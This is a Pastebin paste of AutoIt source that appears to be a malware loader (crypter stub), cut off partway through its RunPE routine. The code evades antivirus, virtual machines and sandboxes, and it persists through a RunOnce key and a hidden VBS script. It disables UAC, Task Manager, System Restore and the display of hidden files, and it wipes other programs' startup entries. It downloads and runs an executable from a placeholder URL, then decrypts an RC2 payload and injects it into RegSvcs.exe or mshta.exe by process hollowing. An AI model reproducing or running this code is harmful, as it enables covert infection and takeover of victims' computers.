Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #RequireAdmin
- ;hwid=F65F986EE6D635C25CB12C59AD6B4A7587500B110x75736572
- #NoTrayIcon
- If ProcessExists("avastui.exe") Then Sleep(20000)
- $path = "asvep"
- $uniscriptdir = FileGetShortName(@ScriptDir)
- $uniscriptfullpath = FileGetShortName(@scriptfullpath)
- $unicode_userprofile = FileGetShortName(@UserProfileDir)
- $unicode_startup = FileGetShortName(@StartupDir)
- $unicode_temp = FileGetShortName(@TempDir)
- $unicode_windows = FileGetShortName(@WindowsDir)
- $unicode_system = FileGetShortName(@SystemDir)
- FileSetAttrib($uniscriptdir, "+SHR")
- $Dir = $uniscriptfullpath
- $STR = StringSplit($Dir, "\\", 1)
- $directory = False
- For $i = 1 To $STR[0]
- If $STR[$i] = $path And $Dir = $unicode_userprofile & "\\" & $path & "\\" & @ScriptName Then
- $directory = True
- ExitLoop
- EndIf
- Next
- If $STR[0] - 1 And $directory = False Then
- bsod()
- EndIf
- ;options----------------------------------------------------------------------------------------------
- ;delay
- Local $delay = IniRead($uniscriptdir & "\65901.PPZ", "delay1", "delay2", "NotFound")
- If $delay = "delay3" Then
- delay()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;mutex
- Local $mutex = IniRead($uniscriptdir & "\65901.PPZ", "mutex1", "mutex2", "NotFound")
- If $mutex = "mutex3" Then
- mutex()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;startup
- Local $startup = IniRead($uniscriptdir & "\65901.PPZ", "5378250", "6296134", "NotFound")
- If $startup = "4064234" Then
- startup()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;antis
- Local $antis = IniRead($uniscriptdir & "\65901.PPZ", "antis1", "antis2", "NotFound")
- If $antis = "antis3" Then
- antis()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;fake message
- Local $fake = IniRead($uniscriptdir & "\65901.PPZ", "fake1", "fake2", "NotFound")
- If $fake = "fake3" Then
- fakemessage()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;botkiller
- Local $botkiller = IniRead($uniscriptdir & "\65901.PPZ", "botkiller1", "botkiller2", "NotFound")
- If $botkiller = "botkiller3" Then
- botkiller()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;downloader
- Local $downloader = IniRead($uniscriptdir & "\65901.PPZ", "downloader1", "downloader2", "NotFound")
- If $downloader = "downloader3" Then
- downloader()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;disable uac
- Local $uac = IniRead($uniscriptdir & "\65901.PPZ", "6404000", "6662859", "NotFound")
- If $uac = "9455413" Then
- disable_uac()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;Disable System Restore
- Local $systemrestore = IniRead($uniscriptdir & "\65901.PPZ", "systemrestore1", "systemrestore2", "NotFound")
- If $systemrestore = "systemrestore3" Then
- disable_syste_restore()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;antitask
- Local $antitask = IniRead($uniscriptdir & "\65901.PPZ", "antitask1", "antitask2", "NotFound")
- If $antitask = "antitask3" Then
- antitask()
- Else
- EndIf
- ;Functions--------------------------------------------------------------------------------------------------------------------------
- ;delay
- Func delay()
- $counter = 0
- While $counter <= 5
- Sleep(5000)
- ShellExecute(@SystemDir & "\mshta.exe")
- $counter = $counter + 1
- _RunDos("taskkill /IM mshta.exe")
- WEnd
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;System Hide
- Func systemhide()
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1) ; don't show folder options
- Regwrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0) ; don't show hidden files
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;fake message
- Func fakemessage()
- $type = IniRead($uniscriptdir & "\65901.PPZ", "messagetype1", "messagetype2","NotFound")
- $title = IniRead($uniscriptdir & "\65901.PPZ", "messagetitle1", "messagetitle2","NotFound")
- $message = IniRead($uniscriptdir & "\65901.PPZ", "messagetext1", "messagetext2","NotFound")
- If FileExists($unicode_userprofile & "\\" & $path & "\check.txt") Then
- ;do nothing
- Else
- MsgBox($type,$title,$message)
- FileWrite($unicode_userprofile & "\\" & $path & "\check.txt", "")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;mutex
- Func mutex()
- $scriptname = "winupdate.exe"
- If UBound(ProcessList($scriptname)) > 2 Then Exit
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;anti task manager
- func antitask()
- $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
- if Not ($read_antitask = "1") Then
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;disable uac
- func disable_uac()
- $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" , "EnableLUA")
- if Not ($read_uac = "0") Then
- RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" , "EnableLUA" , "REG_DWORD" , "0")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;startup
- Func startup()
- $bUAC = _CheckElevationEnabled()
- If $bUAC = 0 Then
- ;do nothing
- Else
- FileCreateShortcut($unicode_userprofile & "\\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
- FileSetAttrib($unicode_startup & "\start.lnk","+SH")
- EndIf
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
- If Not FileExists($unicode_userprofile & "\\" & $path & "\start.vbs") Then
- Local $bat = FileOpen($unicode_userprofile & "\\" & $path & "\start.cmd", 1)
- $autoit3 = "winupdate.exe"
- FileWrite($bat, "@echo off" & @CRLF & "cd " & "%userprofile%\" & $path & "\\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
- FileClose($bat)
- Local $vbs = FileOpen($unicode_userprofile & "\\" & $path & "\start.vbs", 1)
- FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & $unicode_userprofile & "\\" & $path & "\\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
- FileClose($vbs)
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
- FileSetAttrib($unicode_userprofile & "\\" & $path & "\start.vbs","+SHR")
- FileSetAttrib($unicode_userprofile & "\\" & $path & "\start.cmd","+SHR")
- if FileExists($unicode_startup & "\start.lnk") Then
- FileDelete($unicode_startup & "\start.lnk")
- EndIf
- Else
- EndIf
- EndFunc
- ;Checks if Use Access Control (UAC) is Enabled.
- Func _CheckElevationEnabled()
- Local $struct = DllStructCreate("BOOL")
- Local $aRtn = DllCall("kernel32.dll","DWORD","CheckElevationEnabled","ptr", DllStructGetPtr($struct))
- If @error Then
- Return SetError(@error)
- EndIf
- Return SetError($aRtn[0],0,DllStructGetData($struct,1))
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;Antis
- func antis()
- ;anti sandbox
- If WinGetText("Program Manager") = "0" Then
- Exit
- Else
- EndIf
- ;anti vm's
- if ProcessExists("VboxService.exe") Then
- Exit
- EndIf
- if ProcessExists("VMwaretray.exe") Then
- Exit
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;Persistence
- func persistence()
- if processexists("RegSvcs.exe") then
- ;do nothing
- else
- $pathtovbs = ($uniscriptdir & "\\" & "7246235.vbe")
- ShellExecute($pathtovbs)
- exit
- endif
- endfunc
- ;------------------------------------------------------------------------------------------------------
- ;Downloader
- Func downloader()
- if FileExists($unicode_userprofile & "\\" & $path & "\dl.txt") Then
- ;do nothing
- Else
- FileWrite($unicode_userprofile & "\\" & $path & "\dl.txt","")
- ; Advanced example - downloading in the background
- $random_download_name = Random(10000, 99999, 1) & ".exe"
- Local $hDownload = InetGet("replace-me-url", $unicode_temp & "\\" & $random_download_name, 1, 1)
- Do
- Sleep(250)
- Until InetGetInfo($hDownload, 2) ; Check if the download is complete.
- Local $nBytes = InetGetInfo($hDownload, 0)
- InetClose($hDownload) ; Close the handle to release resources.
- ShellExecute($unicode_temp & "\\" & $random_download_name)
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;BSOD
- Func bsod()
- $a = ProcessList()
- For $i = 1 To UBound($a) - 1
- ProcessClose($a[$i][0])
- Next
- Exit
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;botkiller
- Func botkiller()
- ;delete
- RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- ;restore
- RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- ;Else
- ;delete
- RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- ;restore
- RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- FileDelete(@StartupDir & "\*.*")
- EndFunc ;==>botkiller
- func disable_syste_restore()
- if FileExists($uniscriptdir & "\check.txt") Then
- ;do nothing
- Else
- RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
- FileWrite($uniscriptdir & "\check.txt","")
- EndIf
- EndFunc
- ;data from crypt.au3 & process.au3:--------------------------------------------------------------------------------------------------------------------------
- Func _RunDos($sCommand)
- Local $nResult = RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
- Return SetError(@error, @extended, $nResult)
- EndFunc ;==>_RunDos
- Global Const $PROV_RSA_FULL = 0x1
- Global Const $PROV_RSA_AES = 24
- Global Const $CRYPT_VERIFYCONTEXT = 0xF0000000
- Global Const $HP_HASHSIZE = 0x0004
- Global Const $HP_HASHVAL = 0x0002
- Global Const $CRYPT_EXPORTABLE = 0x00000001
- Global Const $CRYPT_USERDATA = 1
- Global Const $CALG_MD2 = 0x00008001
- Global Const $CALG_MD4 = 0x00008002
- Global Const $CALG_MD5 = 0x00008003
- Global Const $CALG_SHA1 = 0x00008004
- Global Const $CALG_3DES = 0x00006603
- Global Const $CALG_AES_128 = 0x0000660e
- Global Const $CALG_AES_192 = 0x0000660f
- Global Const $CALG_AES_256 = 0x00006610
- Global Const $CALG_DES = 0x00006601
- Global Const $CALG_RC2 = 0x00006602
- Global Const $CALG_RC4 = 0x00006801
- Global Const $CALG_USERKEY = 0
- Global $__g_aCryptInternalData[3]
- Func _Crypt_EncryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True)
- Local $hBuff
- Local $iError
- Local $vReturn
- Local $ReqBuffSize
- Local $aRet
- _Crypt_Startup()
- Do
- If $iALG_ID <> $CALG_USERKEY Then
- $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID)
- If @error Then
- $iError = 1
- $vReturn = -1
- ExitLoop
- EndIf
- EndIf
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vData), "dword", 0)
- If @error Or Not $aRet[0] Then
- $iError = 2
- $vReturn = -1
- ExitLoop
- EndIf
- $ReqBuffSize = $aRet[6]
- $hBuff = DllStructCreate("byte[" & $ReqBuffSize & "]")
- DllStructSetData($hBuff, 1, $vData)
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "struct*", $hBuff, "dword*", BinaryLen($vData), "dword", DllStructGetSize($hBuff))
- If @error Or Not $aRet[0] Then
- $iError = 3
- $vReturn = -1
- ExitLoop
- EndIf
- $iError = 0
- $vReturn = DllStructGetData($hBuff, 1)
- Until True
- Return $vReturn
- EndFunc ;==>_Crypt_EncryptData
- Func _Crypt_DecryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True)
- Local $hBuff
- Local $iError
- Local $vReturn
- Local $hTempStruct
- Local $iPlainTextSize
- Local $aRet
- _Crypt_Startup()
- Do
- If $iALG_ID <> $CALG_USERKEY Then
- $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID)
- If @error Then
- $iError = 1
- $vReturn = -1
- ExitLoop
- EndIf
- EndIf
- $hBuff = DllStructCreate("byte[" & BinaryLen($vData) + 1000 & "]")
- DllStructSetData($hBuff, 1, $vData)
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDecrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "struct*", $hBuff, "dword*", BinaryLen($vData))
- If @error Or Not $aRet[0] Then
- $iError = 2
- $vReturn = -1
- ExitLoop
- EndIf
- $iPlainTextSize = $aRet[6]
- $hTempStruct = DllStructCreate("byte[" & $iPlainTextSize & "]", DllStructGetPtr($hBuff))
- $iError = 0
- $vReturn = DllStructGetData($hTempStruct, 1)
- Until True
- Return $vReturn
- EndFunc ;==>_Crypt_DecryptData
- Func _Crypt_Startup()
- If __Crypt_RefCount() = 0 Then
- Local $hAdvapi32 = DllOpen("Advapi32.dll")
- If @error Then Return SetError(1, 0, False)
- __Crypt_DllHandleSet($hAdvapi32)
- Local $aRet
- Local $iProviderID = $PROV_RSA_AES
- If @OSVersion = "WIN_2000" Then $iProviderID = $PROV_RSA_FULL ; Provide backwards compatibility with win2000
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iProviderID, "dword", $CRYPT_VERIFYCONTEXT)
- If @error Or Not $aRet[0] Then
- DllClose(__Crypt_DllHandle())
- Return SetError(2, 0, False)
- Else
- __Crypt_ContextSet($aRet[1])
- ; Fall through to success.
- EndIf
- EndIf
- __Crypt_RefCountInc()
- Return True
- EndFunc ;==>_Crypt_Startup
- Func _Crypt_DeriveKey($vPassword, $iALG_ID, $iHash_ALG_ID = $CALG_MD5)
- Local $aRet
- Local $hCryptHash
- Local $hBuff
- Local $iError
- Local $vReturn
- _Crypt_Startup()
- Do
- ; Create Hash object
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptCreateHash", "handle", __Crypt_Context(), "uint", $iHash_ALG_ID, "ptr", 0, "dword", 0, "handle*", 0)
- If @error Or Not $aRet[0] Then
- $iError = 1
- $vReturn = -1
- ExitLoop
- EndIf
- $hCryptHash = $aRet[5]
- $hBuff = DllStructCreate("byte[" & BinaryLen($vPassword) & "]")
- DllStructSetData($hBuff, 1, $vPassword)
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptHashData", "handle", $hCryptHash, "struct*", $hBuff, "dword", DllStructGetSize($hBuff), "dword", $CRYPT_USERDATA)
- If @error Or Not $aRet[0] Then
- $iError = 2
- $vReturn = -1
- ExitLoop
- EndIf
- ; Create key
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDeriveKey", "handle", __Crypt_Context(), "uint", $iALG_ID, "handle", $hCryptHash, "dword", $CRYPT_EXPORTABLE, "handle*", 0)
- If @error Or Not $aRet[0] Then
- $iError = 3
- $vReturn = -1
- ExitLoop
- EndIf
- $iError = 0
- $vReturn = $aRet[5]
- Until True
- If $hCryptHash <> 0 Then DllCall(__Crypt_DllHandle(), "bool", "CryptDestroyHash", "handle", $hCryptHash)
- Return SetError($iError, 0, $vReturn)
- EndFunc ;==>_Crypt_DeriveKey
- Func __Crypt_ContextSet($hCryptContext)
- $__g_aCryptInternalData[2] = $hCryptContext
- EndFunc ;==>__Crypt_ContextSet
- Func __Crypt_Context()
- Return $__g_aCryptInternalData[2]
- EndFunc ;==>__Crypt_Context
- Func __Crypt_DllHandleSet($hAdvapi32)
- $__g_aCryptInternalData[1] = $hAdvapi32
- EndFunc ;==>__Crypt_DllHandleSet
- Func __Crypt_DllHandle()
- Return $__g_aCryptInternalData[1]
- EndFunc ;==>__Crypt_DllHandle
- Func __Crypt_RefCountDec()
- If $__g_aCryptInternalData[0] > 0 Then $__g_aCryptInternalData[0] -= 1
- EndFunc ;==>__Crypt_RefCountDec
- Func __Crypt_RefCountInc()
- $__g_aCryptInternalData[0] += 1
- EndFunc ;==>__Crypt_RefCountInc
- Func __Crypt_RefCount()
- Return $__g_aCryptInternalData[0]
- EndFunc ;==>__Crypt_RefCount
- ;end of data from crypt.au3
- SubMain()
- Func SubMain()
- $sKey = IniRead($uniscriptdir & "\65901.PPZ", "1109091", "1109091", "NotFound")
- $sAppPath1 = FileGetShortName(@ScriptDir & "\20070.RQT")
- $sAppPath = FileRead(FileOpen($sAppPath1,16))
- $sArquive = _Crypt_DecryptData($sAppPath, $sKey, $CALG_RC2)
- _RunPE($sArquive)
- EndFunc
- Func Info($GetFileData, $StringToGet) ; this is the func that get the settings of the Binded file to be decrypted
- Return StringTrimLeft($GetFileData, StringInStr($GetFileData, $StringToGet) - 1 + StringLen($StringToGet))
- EndFunc
- ;RUNPE
- Func _RunPE($bbinaryimage, $scommandline = "")
- #region 1. DETERMINE INTERPRETER TYPE
- Local $fautoitx64 = @AutoItX64
- #region 2. PREDPROCESSING PASSED
- Local $bbinary = Binary($bbinaryimage)
- Local $tbinary = DllStructCreate("BYTE[" & BinaryLen($bbinary) & "]")
- DllStructSetData($tbinary, 1, $bbinary)
- Local $ppointer = DllStructGetPtr($tbinary)
- #region 3. CREATING NEW PROCESS
- Local $tstartupinfo = DllStructCreate("DWORD CBSIZE;" & "PTR RESERVED;" & "PTR DESKTOP;" & "PTR TITLE;" & "DWORD X;" & "DWORD Y;" & "DWORD XSIZE;" & "DWORD YSIZE;" & "DWORD XCOUNTCHARS;" & "DWORD YCOUNTCHARS;" & "DWORD FILLATTRIBUTE;" & "DWORD FLAGS;" & "WORD SHOWWINDOW;" & "WORD RESERVED2;" & "PTR RESERVED2;" & "PTR HSTDINPUT;" & "PTR HSTDOUTPUT;" & "PTR HSTDERROR")
- Local $tprocess_information = DllStructCreate("PTR PROCESS;" & "PTR THREAD;" & "DWORD PROCESSID;" & "DWORD THREADID")
- $Injecto2 = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe")
- $Injecto4 = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe")
- $Inject_other = ($unicode_system & "\mshta.exe")
- If FileExists($Injecto4) Then
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Injecto4, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
- Elseif FileExists($Injecto2) then
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Injecto2, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
- Else
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Inject_other, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
- EndIf
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
- Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
- Local $hthread = DllStructGetData($tprocess_information, "THREAD")
- If $fautoitx64 And __runpe_iswow64process($hprocess) Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(2, 0, 0)
- EndIf
- #region 4. FILL CONTEXT STRUCTURE
- Local $irunflag, $tcontext
- If $fautoitx64 Then
- If @OSArch = "X64" Then
- $irunflag = 2
- $tcontext = DllStructCreate("ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & "DWORD CONTEXTFLAGS; DWORD MXCSR;" & "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & "UINT64 RIP;" & "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP")
- Else
- $irunflag = 3
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(102, 0, 0)
- EndIf
- Else
- $irunflag = 1
- $tcontext = DllStructCreate("DWORD CONTEXTFLAGS;" & "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & "DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & "DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & "BYTE EXTENDEDREGISTERS[512]")
- EndIf
- Local $context_full
- Switch $irunflag
- ;
- Case 1
- ;
- $context_full = 65543
- Case 2
- $context_full = 1048583
- ;
- Case 3
- ;
- $context_full = 524327
- ;
- EndSwitch
- DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
- $acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
- If @error Or Not $acall[0] Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(3, 0, 0)
- EndIf
- Local $ppeb
- Switch $irunflag
- Case 1
- $ppeb = DllStructGetData($tcontext, "EBX")
- Case 2
- $ppeb = DllStructGetData($tcontext, "RDX")
- Case 3
- EndSwitch
- #region 5. READ PE-FORMAT
- Local $timage_dos_header = DllStructCreate("CHAR MAGIC[2];" & "WORD BYTESONLASTPAGE;" & "WORD PAGES;" & "WORD RELOCATIONS;" & "WORD SIZEOFHEADER;" & "WORD MINIMUMEXTRA;" & "WORD MAXIMUMEXTRA;" & "WORD SS;" & "WORD SP;" & "WORD CHECKSUM;" & "WORD IP;" & "WORD CS;" & "WORD RELOCATION;" & "WORD OVERLAY;" & "CHAR RESERVED[8];" & "WORD OEMIDENTIFIER;" & "WORD OEMINFORMATION;" & "CHAR RESERVED2[20];" & "DWORD ADDRESSOFNEWEXEHEADER", $ppointer)
- Local $pheaders_new = $ppointer
- $ppointer += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
- Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
- If Not ($smagic == "MZ") Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(4, 0, 0)
- EndIf
- Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $ppointer)
- $ppointer += 4
- If DllStructGetData($timage_nt_signature, "SIGNATURE") <> 17744 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(5, 0, 0)
- EndIf
- Local $timage_file_header = DllStructCreate("WORD MACHINE;" & "WORD NUMBEROFSECTIONS;" & "DWORD TIMEDATESTAMP;" & "DWORD POINTERTOSYMBOLTABLE;" & "DWORD NUMBEROFSYMBOLS;" & "WORD SIZEOFOPTIONALHEADER;" & "WORD CHARACTERISTICS", $ppointer)
- Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
- $ppointer += 20
- Local $tmagic = DllStructCreate("WORD MAGIC;", $ppointer)
- Local $imagic = DllStructGetData($tmagic, 1)
- Local $timage_optional_header
- If $imagic = 267 Then
- If $fautoitx64 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(6, 0, 0)
- EndIf
- $timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "DWORD BASEOFDATA;" & "DWORD IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "DWORD SIZEOFSTACKRESERVE;" & "DWORD SIZEOFSTACKCOMMIT;" & "DWORD SIZEOFHEAPRESERVE;" & "DWORD SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $ppointer)
- $ppointer += 96
- ElseIf $imagic = 523 Then
- If Not $fautoitx64 Then
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(6, 0, 0)
- EndIf
- $timage_optional_header = DllStructCreate("WORD MAGIC;" & "BYTE MAJORLINKERVERSION;" & "BYTE MINORLINKERVERSION;" & "DWORD SIZEOFCODE;" & "DWORD SIZEOFINITIALIZEDDATA;" & "DWORD SIZEOFUNINITIALIZEDDATA;" & "DWORD ADDRESSOFENTRYPOINT;" & "DWORD BASEOFCODE;" & "UINT64 IMAGEBASE;" & "DWORD SECTIONALIGNMENT;" & "DWORD FILEALIGNMENT;" & "WORD MAJOROPERATINGSYSTEMVERSION;" & "WORD MINOROPERATINGSYSTEMVERSION;" & "WORD MAJORIMAGEVERSION;" & "WORD MINORIMAGEVERSION;" & "WORD MAJORSUBSYSTEMVERSION;" & "WORD MINORSUBSYSTEMVERSION;" & "DWORD WIN32VERSIONVALUE;" & "DWORD SIZEOFIMAGE;" & "DWORD SIZEOFHEADERS;" & "DWORD CHECKSUM;" & "WORD SUBSYSTEM;" & "WORD DLLCHARACTERISTICS;" & "UINT64 SIZEOFSTACKRESERVE;" & "UINT64 SIZEOFSTACKCOMMIT;" & "UINT64 SIZEOFHEAPRESERVE;" & "UINT64 SIZEOFHEAPCOMMIT;" & "DWORD LOADERFLAGS;" & "DWORD NUMBEROFRVAANDSIZES", $ppointer)
- $ppointer += 112
- Else
- DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
- Return SetError(6, 0, 0)
- EndIf
- Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
- Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
- Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
- Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
- $ppointer += 8
- $ppointer += 8
- $ppointer += 24
- Local $timage_directory_entry_basereloc = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZE", $ppointer)
- Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
- Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
- Local $frelocatable
- If $paddressnewbasereloc And $isizebasereloc Then $frelocatable = True
- If Not $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
- $ppointer += 88
- #region 6. ALLOCATE 'NEW' MEMORY SPACE
- Local $frelocate
- Local $pzeropoint
- If $frelocatable Then
